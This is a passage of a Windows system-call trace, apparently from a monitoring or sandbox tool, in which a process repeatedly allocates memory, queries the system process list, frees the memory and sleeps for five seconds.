returned 0x0 [0254.084] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.085] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.087] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.089] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.089] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.094] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.095] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.098] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.098] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.101] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.102] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.104] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.105] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.105] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.109] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.110] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.111] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.112] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.113] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.113] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.116] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.117] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.118] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.119] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.120] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.120] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.124] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.124] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.126] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.127] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.128] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.132] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.132] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.135] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.139] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.143] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.143] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.148] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.148] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.150] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.156] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.157] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.159] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.162] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.163] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.166] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.229] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.229] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.231] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.237] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.238] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.239] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.243] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.246] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.249] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.249] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.253] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.255] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.256] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.256] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.260] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.261] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.273] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.274] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.275] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.275] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.282] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.284] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.286] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.286] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.292] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.293] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.294] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.296] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.296] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.301] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.302] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.304] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.305] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.305] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.311] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.312] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.315] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.315] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.320] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.320] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.322] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.323] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, 